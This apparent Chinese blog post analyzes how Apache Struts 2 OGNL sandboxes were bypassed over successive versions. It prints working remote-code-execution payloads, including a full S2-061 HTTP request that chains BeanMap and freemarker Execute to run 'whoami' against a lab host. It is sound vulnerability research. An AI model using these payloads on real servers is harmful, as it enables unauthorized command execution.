依赖绕过沙箱

于 2025-02-05 04:45:00 发布
阅读量581 收藏 11
点赞数 7
CC 4.0 BY-SA版权
文章标签: 绕过沙箱
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Libao657/article/details/145154921

ognl+cc 依赖绕过沙箱
前言
今天晚上稍微看了一下 Struct2 攻防,然后无意间通过链接跳转,跳转,再跳转,翻到了一位外国老哥的文章,绕过可谓是淋漓尽致,整激动了,感觉能在如此沙箱下绕过,简直是神人,下面来慢慢分析

https://github.blog/security/vulnerability-research/bypassing-ognl-sandboxes-for-fun-and-charities/?ref=blog.projectdiscovery.io#strutsutil:~:text=(PageContextImpl)-,For%20Velocity%3A,-.KEY_velocity.struts2.context
https://securitylab.github.com/research/ognl-apache-struts-exploit-CVE-2018-11776/

基础知识
Struct2
Apache Struts 2(通常简称为 Struts 2)是一个基于 Java 的开源 Web 应用框架,主要用于开发 Java EE(企业级)应用程序。它通过基于模型-视图-控制器(MVC)设计模式提供了灵活的 Web 应用开发能力。

当然现在 spring 是更胜一筹了,它已经老了,新生代开始接替了,而且我不得不说,ognl 表达式漏洞能被研究如此地步,这个前代的老人功不可没

在 Struts 2 框架中,OGNL (Object-Graph Navigation Language) 是一个非常重要的功能,它被广泛应用于表达式语言(EL)中,用于在 Struts 2 中访问和操作 Java 对象的属性。OGNL 使得 Struts 2 可以非常灵活地动态处理数据,并且与模型-视图-控制器(MVC)模式紧密集成。

OGNL 表达式
支持对象方法调用,如 objName.methodName();

支持类静态方法调用和值访问,表达式的格式为`@[类全名(包括包路径)]@[方法名|值名]``,如@java.lang.String@format(‘fruit%s’,’frt’);
访问OGNL上下文(OGNL context)和ActionContext;
可以直接new一个对象
操作符
.操作符:如上所示,可以调用对象的属性和方法
@操作符:用于调用静态对象、静态方法、静态变量
#操作符:定义变量,用于调用非root对象
比如
@ java.lang.Runtime@getRuntime ().exec(‘calc’)

其中的一些重要的内置对象

attr:保存着上面三个作用域的所有属性,如果有重复的则以 request 域中的属性为基准;

VALUE_STACK:值栈,保存着 valueStack 对象,也就是说可以通过 ActionContext 访问到 valueStack 中的值;

下面的绕过会用到,因为绕过需要 content 对象,而这个对象可以从 attr 和 VALUE_STACK 中获取

Struct2 的攻防历史
我们知道在 OGNL 使用 # 符号可以访问各种全局对象
两个重要的角色,也一直是攻击和防御的核心

第一个是 _memberAccess,它是一个 SecurityMemberAccess 对象,用于控制 OGNL 可以做什么,另一个是 context,它允许访问更多对象,其中许多对象对漏洞利用构建很有用。

静态方法调用
绕过
一开始ognl 设置了一个属性,来禁用静态方法 allowStaticMethodAccess

但是可以通过如下方法

#_memberAccess[‘allowStaticMethodAccess’]=true
然后

@java.lang.Runtime@getRuntime().exec(‘calc’)
这个payload 就可以执行了

修复
在 2.3.14.1 及更高版本中,allowStaticMethodAccess 变为 final,无法再更改。

实例化对象调用方法
不可以调用静态方法后,但是还允许构造任意类并访问其公共方法,所以其实我们根本不需要调用静态方法就可以执行命令

(#p=new java.lang.ProcessBuilder(‘calc’)).(#p.start())
黑名单
在 2.3.20 中,引入了黑名单 excludedClasses、excludedPackageNames 和 excludedPackageNamePatterns

而且禁用了构造函数的调用,不能使用静态方法

绕过点在于_memberAccess 仍然可以访问,而且 DefaultMemberAccess 对象任然允许静态方法和构造函数的调用

所以我们替换_memberAccess 来置空黑名单绕过

(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(@java.lang.Runtime@getRuntime().exec(‘calc’))
实例化 OgnlUtil
之后把类 ognl.MemberAccess 和 ognl.DefaultMemberAccess 放在了我们的黑名单中

这里使用的是实例化 OgnlUtil 对象去置空黑名单

我们的 container 中 getInstance 方法可以实例化 OgnlUtil 类

而_memberAccess 的初始化是
createActionContext 方法创建新的 ActionContext,会调用 OgnlValueStack 的 setOgnlUtil 方法,以使用 OgnlUtil 的全局实例初始化 OgnlValueStack 的 securityMemberAccess,这样置空_memberAccess 的黑名单

(#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.excludedClasses.clear()).(#ognlUtil.excludedPackageNames.clear()).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec(‘calc’))
绕过clear
在之后的版本中,我们的黑名单不再可以使用clear 置空,视乎黑名单不可以再被删除

但是我们可以调用对于的setter 方法去设置一个空的黑名单

(#context=#attr[‘struts.valueStack’].context).(#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses(‘’)).(#ognlUtil.setExcludedPackageNames(‘’)).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec(‘calc’))
可惜从栈中得到的 ognlUtil 只是当前栈的

`_memberAccess 是一个瞬态对象,它是在创建新的 ActionContext 期间当请求进入时创建的。每次通过 createActionContext 方法创建新的 ActionContext 时,都会调用 setOgnlUtil 方法,以使用全局 ognlUtil 中的 excludedClasses、excludedPackageNames 等黑名单创建_memberAccess。因此,通过重新发送请求,新创建的 _memberAccess 将清空其列入黑名单的类和包,从而允许我们执行任意代码。整理了有效载荷,我以这两个有效载荷结束。第一个选项清空 excludedClasses 和 excludedPackageNames 黑名单

(#context=#attr[‘struts.valueStack’].context).(#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses(‘’)).(#ognlUtil.setExcludedPackageNames(‘’))
(#context=#attr[‘struts.valueStack’].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec(‘calc’))
配合cc 依赖的最后一舞
我们看看到我们的S0-61
现在已经变成什么模样了呢

无法 new 一个对象
无法调用黑名单类和包的方法、属性
无法使用反射
无法调用静态方法
黑名单

public static Object invokeMethod(Object target, Method method, Object[] argsArray) throws InvocationTargetException, IllegalAccessException { if (_useStricterInvocation) { Class methodDeclaringClass = method.getDeclaringClass(); if (AO_SETACCESSIBLE_REF != null && AO_SETACCESSIBLE_REF.equals(method) || AO_SETACCESSIBLE_ARR_REF != null && AO_SETACCESSIBLE_ARR_REF.equals(method) || SYS_EXIT_REF != null && SYS_EXIT_REF.equals(method) || SYS_CONSOLE_REF != null && SYS_CONSOLE_REF.equals(method) || AccessibleObjectHandler.class.isAssignableFrom(methodDeclaringClass) || ClassResolver.class.isAssignableFrom(methodDeclaringClass) || MethodAccessor.class.isAssignableFrom(methodDeclaringClass) || MemberAccess.class.isAssignableFrom(methodDeclaringClass) || OgnlContext.class.isAssignableFrom(methodDeclaringClass) || Runtime.class.isAssignableFrom(methodDeclaringClass) || ClassLoader.class.isAssignableFrom(methodDeclaringClass) || ProcessBuilder.class.isAssignableFrom(methodDeclaringClass) || AccessibleObjectHandlerJDK9Plus.unsafeOrDescendant(methodDeclaringClass)) { throw new IllegalAccessException(“Method [” + method + "] cannot be called from within OGNL invokeMethod() " + “under stricter invocation mode.”); } }
简直寸步难行,总结下来我们可以干的有两件事

可以访问对象的属性,调用已经实例化好对象的一些方法

两个条件连起来,那我们必须找一个属性,而这个属性本身就是一个实例化对象,而且这个实例化对象中有可以恶意利用的方法

这时候我们就需要利用ognl 表达式中的一些对象了在这里插入图片描述
而 #application 中的 org.apache.tomcat.InstanceManager ,他 value 为org.apache.catalina.core.DefaultInstanceManager ` 的实例化对象,该类为tomcat中的类
看到它的方法
在这里插入图片描述
其中传入的参数是我们可以控制的,这样我们就可以绕过不能实例化类的限制

但是还是有个问题,黑名单中禁用了我们需要的类,如何置空黑名单是一个问题

纵观前面置空的方法

从content,attr,等等属性中获取的方法都已经被加入到了黑名单中

不过这里关键就在于有cc 依赖,因为是可以通过getter,setter 方法访问属性的

关键类就是

org.apache.commons.collections.BeanMap

它有一个setbean 方法

public void setBean( Object newBean ) {
bean = newBean;
reinitialise();
}
跟进 reinitialise 方法

protected void reinitialise() {
readMethods.clear();
writeMethods.clear();
types.clear();
initialise();
}
跟进 initialise 方法

private void initialise() {
if(getBean() == null) return;

Class  beanClass = getBean().getClass();
try {
    //BeanInfo beanInfo = Introspector.getBeanInfo( bean, null );
    BeanInfo beanInfo = Introspector.getBeanInfo( beanClass );
    PropertyDescriptor[] propertyDescriptors = beanInfo.getPropertyDescriptors();
    if ( propertyDescriptors != null ) {
        for ( int i = 0; i < propertyDescriptors.length; i++ ) {
            PropertyDescriptor propertyDescriptor = propertyDescriptors[i];
            if ( propertyDescriptor != null ) {
                String name = propertyDescriptor.getName();
                Method readMethod = propertyDescriptor.getReadMethod();
                Method writeMethod = propertyDescriptor.getWriteMethod();
                Class aType = propertyDescriptor.getPropertyType();

                if ( readMethod != null ) {
                    readMethods.put( name, readMethod );
                }
                if ( writeMethod != null ) {
                    writeMethods.put( name, writeMethod );
                }
                types.put( name, aType );
            }
        }
    }
}
catch ( IntrospectionException e ) {
    logWarn(  e );
}

}
这里的逻辑就很明显了,获取类,然后再反射获取它的getter,setter 方法

可以跟进 getReadMethod

public synchronized Method getReadMethod() {
Method readMethod = this.readMethodRef.get();
if (readMethod == null) {
Class<?> cls = getClass0();
if (cls == null || (readMethodName == null && !this.readMethodRef.isSet())) {
// The read method was explicitly set to null.
return null;
}
String nextMethodName = Introspector.GET_PREFIX + getBaseName();
if (readMethodName == null) {
Class<?> type = getPropertyType0();
if (type == boolean.class || type == null) {
readMethodName = Introspector.IS_PREFIX + getBaseName();
} else {
readMethodName = nextMethodName;
}
}

    // Since there can be multiple write methods but only one getter
    // method, find the getter method first so that you know what the
    // property type is.  For booleans, there can be "is" and "get"
    // methods.  If an "is" method exists, this is the official
    // reader method so look for this one first.
    readMethod = Introspector.findMethod(cls, readMethodName, 0);
    if ((readMethod == null) &amp;&amp; !readMethodName.equals(nextMethodName)) {
        readMethodName = nextMethodName;
        readMethod = Introspector.findMethod(cls, readMethodName, 0);
    }
    try {
        setReadMethod(readMethod);
    } catch (IntrospectionException ex) {
        // fall
    }
}
return readMethod;

}
可以看到就是获取getter 方法

那我们可不可以通过getter 方法获取到content 然后去置空我们的黑名单呢?

这是当然
com.opensymphony.xwork2.ognl.OgnlValueStack 类中就有 getContext 方法可以返回 OgnlContext

有了 OgnlContext 我们就可以去一样的原理

获取com.opensymphony.xwork2.ognl.SecurityMemberAccess 对象,然后调用 setExcludedClasses,setExcludedPackageNames 覆盖黑名单

漏洞复现
环境搭建

这里可以直接使用p 神的环境在这里插入图片描述
POST /index.action HTTP/1.1
Host: 192.168.177.146:8080
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 831

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name=“id”

%{(#instancemanager=#application[“org.apache.tomcat.InstanceManager”]).(#stack=#attr[“com.opensymphony.xwork2.util.ValueStack.ValueStack”]).(#bean=#instancemanager.newInstance(“org.apache.commons.collections.BeanMap”)).(#bean.setBean(#stack)).(#context=#bean.get(“context”)).(#bean.setBean(#context)).(#macc=#bean.get(“memberAccess”)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(“java.util.HashSet”)).(#bean.put(“excludedClasses”,#emptyset)).(#bean.put(“excludedPackageNames”,#emptyset)).(#arglist=#instancemanager.newInstance(“java.util.ArrayList”)).(#arglist.add(“whoami”)).(#execute=#instancemanager.newInstance(“freemarker.template.utility.Execute”)).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF–在这里插入图片描述
简单再解释一下payload 吧

%{(#instancemanager=#application[“org.apache.tomcat.InstanceManager”]).(#stack=#attr[“com.opensymphony.xwork2.util.ValueStack.ValueStack”]).(#bean=#instancemanager.newInstance(“org.apache.commons.collections.BeanMap”)).(#bean.setBean(#stack)).(#context=#bean.get(“context”)).(#bean.setBean(#context)).(#macc=#bean.get(“memberAccess”)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(“java.util.HashSet”)).(#bean.put(“excludedClasses”,#emptyset)).(#bean.put(“excludedPackageNames”,#emptyset)).(#arglist=#instancemanager.newInstance(“java.util.ArrayList”)).(#arglist.add(“whoami”)).(#execute=#instancemanager.newInstance(“freemarker.template.utility.Execute”)).(#execute.exec(#arglist))}
实例化对象的过程不说了,主要是 `bean.setBean( #stack ))后我们就可以通过ValueStack获取content,然后进一步从其中获取memberAccess对象,然后为了调用setter方法修改我们的黑名单,这里采用的是直接定义一个set,其中放置我们的setter方法,然后指定调用,置空了黑名单后,我们就可以调用危险的方法了,比如freemarker.template.utility.Execute的exec方法去执行命令

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值